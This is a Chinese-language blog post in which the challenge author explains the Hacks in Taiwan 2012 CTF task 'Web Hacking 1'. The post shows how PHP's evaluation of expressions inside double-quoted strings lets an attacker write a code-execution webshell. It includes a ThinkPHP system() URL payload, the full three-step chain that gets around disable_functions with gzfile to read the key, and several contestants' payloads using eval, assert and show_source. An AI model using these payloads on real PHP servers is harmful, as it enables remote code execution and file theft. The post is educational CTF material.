<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="簡單的 Code Review，所以只有 100 分 結束突然有點感嘆覺得說，台灣玩 Web Hacking 的人雖然多，但都不精，而且滿大比例是 …… 的orz 題目很簡單，Web Hacking 1 外國人題目一出來沒多久就解出來，基本上有在關注這一塊的人應該看到就可以馬上寫出解答! 題目是:  Easy code review.This is a beginning of the web h">
<meta property="og:type" content="article">
<meta property="og:title" content="Hacks in Taiwan 2012 Web Hacking 1 出題詳解">
<meta property="og:url" content="https://blog.orange.tw/posts/2012-07-hacks-in-taiwan-2012-web-hacking-1/index.html">
<meta property="og:site_name" content="Orange Tsai">
<meta property="og:description" content="簡單的 Code Review，所以只有 100 分 結束突然有點感嘆覺得說，台灣玩 Web Hacking 的人雖然多，但都不精，而且滿大比例是 …… 的orz 題目很簡單，Web Hacking 1 外國人題目一出來沒多久就解出來，基本上有在關注這一塊的人應該看到就可以馬上寫出解答! 題目是:  Easy code review.This is a beginning of the web h">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://blog.orange.tw/posts/2012-07-hacks-in-taiwan-2012-web-hacking-1/35832e8ad56e62b6-01.jpg">
<meta property="og:image" content="https://blog.orange.tw/posts/2012-07-hacks-in-taiwan-2012-web-hacking-1/e85790f0c41d4839-02.jpg">
<meta property="article:published_time" content="2012-07-22T16:00:00.000Z">
<meta property="article:modified_time" content="2024-08-21T02:59:38.624Z">
<meta property="article:author" content="Orange Tsai">
<meta property="article:tag" content="Hacker, Security, Vulnerability, Web, RCE, SSRF, XSS, CVE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog.orange.tw/posts/2012-07-hacks-in-taiwan-2012-web-hacking-1/35832e8ad56e62b6-01.jpg">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    
      <title>Hacks in Taiwan 2012 Web Hacking 1 出題詳解 | Orange Tsai</title>
    
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-13047966-1"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'UA-13047966-1');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="Orange Tsai" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
    <div class="content index py4 ">
        
          <header id="header">
  <a class="u-url u-uid" href="/">
  
    
      <img id="logo" alt class="u-logo" src="/images/logo.png" />
    
  
    <div id="title">
      <h1 class="p-name">Orange Tsai</h1>
    </div>
  </a>
  <div id="nav">
    <ul>
      <li class="icon">
        <a href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-2x"></i></a>
      </li>
      <!--
     --><li><a href="/">Home</a></li><!--
   --><!--
     --><li><a href="/articles/">Articles</a></li><!--
   --><!--
     --><li><a href="/talks/">Talks</a></li><!--
   --><!--
     --><li><a href="/about/">About</a></li><!--
   -->
    </ul>
  </div>
</header>

        

        
          <hr style='margin: 0px; margin-bottom: 32px; border: 0.5px solid #ccc; '>
        

        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Hacks in Taiwan 2012 Web Hacking 1 出題詳解
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">🍊 <a href='/about'>Orange Tsai</a></span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2012-07-22T16:00:00.000Z" class="dt-published" itemprop="datePublished">2012-07-23</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>簡單的 Code Review，所以只有 100 分</p>
<p>結束突然有點感嘆覺得說，台灣玩 Web Hacking 的人雖然多，但都不精，而且滿大比例是 …… 的orz</p>
<p>題目很簡單，Web Hacking 1 外國人題目一出來沒多久就解出來，基本上有在關注這一塊的人應該看到就可以馬上寫出解答!</p>
<p>題目是:</p>
<blockquote>
<p>Easy code review.<br>This is a beginning of the web hacking. </p>
</blockquote>
<p>都有 source code 了，再解不出來該去撞豆腐了XD</p>
<p><img src="/posts/2012-07-hacks-in-taiwan-2012-web-hacking-1/35832e8ad56e62b6-01.jpg"></p>
<p>key.php 裡面放著過關金鑰</p>
<p>orange.html 是 orange.php 的原始碼</p>
<p>關卡的 PHP code 有提供 source 給大家 review，並從中找出漏洞進行利用，只有短短幾行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// by Orange@chroot.org, have fun.</span></span><br><span class="line"></span><br><span class="line">    <span class="variable">$data</span> = <span class="variable">$_GET</span>[<span class="string">&quot;data&quot;</span>];</span><br><span class="line">    <span class="variable">$name</span> = <span class="variable">$_GET</span>[<span class="string">&quot;name&quot;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="variable">$arr</span> = <span class="keyword">array</span>(<span class="string">&quot;\&quot;&quot;</span>, <span class="string">&quot;&#x27;&quot;</span>, <span class="string">&quot;;&quot;</span>);</span><br><span class="line">    <span class="variable">$data</span> = <span class="title function_ invoke__">str_replace</span>(<span class="variable">$arr</span>, <span class="string">&quot;&quot;</span>, <span class="variable">$data</span>);</span><br><span class="line"></span><br><span class="line">    <span class="variable">$_</span> = &lt;&lt;&lt; EOF<span class="meta">&lt;?php</span></span><br><span class="line">    \<span class="variable">$title</span> = <span class="string">&quot;<span class="subst">$data</span>&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span>EOF;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$filename</span> = <span class="title function_ invoke__">sprintf</span>(<span class="string">&quot;yourfiles/%s.config.php&quot;</span>, <span class="variable">$name</span>);</span><br><span class="line">    <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$filename</span>, <span class="variable">$_</span>);`</span><br></pre></td></tr></table></figure>

<p>Web Hacking 1 考的觀念是 PHP 中在雙引號中的變數是可以被解析的特性</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$test</span> = <span class="number">123</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$test</span>&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>這樣的結果會是 123，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">&#123;$&#123;phpinfo()&#125;</span>&#125;&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>這樣的結果會執行 phpinfo 這個 function</p>
<p>基本上這不算是一個漏洞，算是 PHP 的一個特性，但在 PHP Code Review 上卻是一個要注意的點</p>
<p>能利用的地方很多，例如在網站後台有功能可以寫設定檔，但是雙引號被 <code>magic_gpc_quote</code> 防禦時則可這樣利用，又或是舉個例子，有一套很火紅的 PHP framework 叫做 thinkPHP，之前被爆出 Code Execution 漏洞，出問題的點在於</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$res</span> = preg\<span class="title function_ invoke__">_replace</span>(<span class="string">&#x27;@(w+)&#x27;</span>.<span class="variable">$depr</span>.<span class="string">&#x27;([^&#x27;</span>.<span class="variable">$depr</span>.<span class="string">&#x27;\/]+)@e&#x27;</span>, <span class="string">&#x27;$var[\&#x27;\\1\&#x27;]=&quot;\\2&quot;;&#x27;</span>, <span class="title function_ invoke__">implode</span>(<span class="variable">$depr</span>,<span class="variable">$paths</span>));</span><br></pre></td></tr></table></figure>

<blockquote>
<p>轉自 <a target="_blank" rel="noopener" href="http://zone.wooyun.org/index.php?do=view&amp;id=44">http://zone.wooyun.org/index.php?do=view&amp;id=44</a></p>
</blockquote>
<p>雖然主要出問題的點在於 <code>preg_replace + e</code> 這個地方，但漏洞利用的觀念還是在於，在 <code>&quot;\\2&quot;</code> 中，變數會被放到雙引號中，所以可以利用這種網址</p>
<blockquote>
<p>&#x2F;index.php?s&#x3D;module&#x2F;action&#x2F;param1&#x2F;${@system($_GET[cmd])}<br>&amp;cmd&#x3D;cat config.php</p>
</blockquote>
<p>直接執行系統指令。</p>
<p>所以完整的利用流程只要三個網址就可以拿到 key 了</p>
<ol>
<li>產生 youtfiles&#x2F;orange.config.php 檔案</li>
</ol>
<blockquote>
<p>http<span>:&#x2F;&#x2F;wg.hack.idv.tw&#x2F;~ow100&#x2F;orange.php?name&#x3D;orange&amp;data&#x3D;${@eval($_GET[cmd])}</p>
</blockquote>
<ol start="2">
<li>第二個步驟的主要目的觀看 php 設定是否有哪些防禦、限制</li>
</ol>
<blockquote>
<p>http<span>:&#x2F;&#x2F;wg.hack.idv.tw&#x2F;~ow100&#x2F;yourfiles&#x2F;orange.config.php?cmd&#x3D;phpinfo(); </p>
</blockquote>
<ol start="3">
<li>繞過 <code>disable_function</code> 的限制，<code>disable_function</code> 的值有</li>
</ol>
<blockquote>
<p>basename,chgrp,chmod,chown,clearstatcache,copy,delete,dirname,disk_free_space,disk_total_space,diskfreespace,fclose,feof,fflush,fgetc,fgetcsv,fgets,fgetss,file_exists,file_get_contents,file,fileatime,filectime,filegroup,fileinode,filemtime,fileowner,fileperms,filesize,filetype,flock,fnmatch,fopen,fpassthru,fputcsv,fputs,fread,fscanf,fseek,fstat,ftell,ftruncate,fwrite,glob,is_dir,is_executable,is_file,is_link,is_readable,is_writable,is_writeable,lchgrp,lchown,link,linkinfo,lstat,mkdir,parse_ini_file,parse_ini_string,pathinfo,pclose,popen,readfile,readlink,realpath_cache_get,realpath_cache_size,realpath,rename,rewind,rmdir,set_file_buffer,stat,symlink,tempnam,tmpfile,touch,umask,unlink,include,include_once,require,requre_once,opendir,readdir,highlight_file,scandir</p>
</blockquote>
<p>這裡我用的方法是用 <code>gzfile</code> ，並不在 <code>disable_function</code> 內，所以可以順利的讀取到 <code>key.php</code></p>
<blockquote>
<p>http<span>:&#x2F;&#x2F;wg.hack.idv.tw&#x2F;~ow100&#x2F;orange.config.php?cmd&#x3D;print_r(gzfile($_GET[b]));&amp;b&#x3D;..&#x2F;key.php </p>
</blockquote>
<p><img src="/posts/2012-07-hacks-in-taiwan-2012-web-hacking-1/e85790f0c41d4839-02.jpg"></p>
<p>額外補充:</p>
<p>yourfiles 下共產生了 704 個  PHP 檔案，看其中內容有研究了一下還滿好玩的XD</p>
<p>除了完全與出題方向不同的 SQL injection, XSS 外有看到幾個比較有創意的答案</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="variable">$title</span> = <span class="string">&quot;<span class="subst">&#123;$&#123;show_source(trim(base64_decode(Li4va2V5LnBocCAK)))&#125;</span>&#125;&quot;</span>; <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span><span class="variable">$zip</span> = <span class="keyword">new</span> <span class="title class_">ZipArchive</span>();<span class="keyword">echo</span> <span class="variable">$zip</span>-&gt;<span class="title function_ invoke__">open</span>(<span class="variable">$_GET</span>[(<span class="keyword">string</span>)<span class="number">1</span>],ZIPARCHIVE::<span class="variable constant_">OVERWRITE</span>);<span class="keyword">echo</span> <span class="variable">$zip</span>-&gt;<span class="title function_ invoke__">addFile</span>(<span class="variable">$_GET</span>[(<span class="keyword">string</span>)<span class="number">2</span>]);<span class="variable">$zip</span>-&gt;<span class="title function_ invoke__">close</span>();<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="variable">$title</span> = <span class="string">&quot;<span class="subst">&#123;$&#123;assert($_GET[1])&#125;</span>&#125;&quot;</span>; <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

  </div>
</article>



        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2009-2024
    Orange Tsai
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/articles/">Articles</a></li><!--
     --><!--
       --><li><a href="/talks/">Talks</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
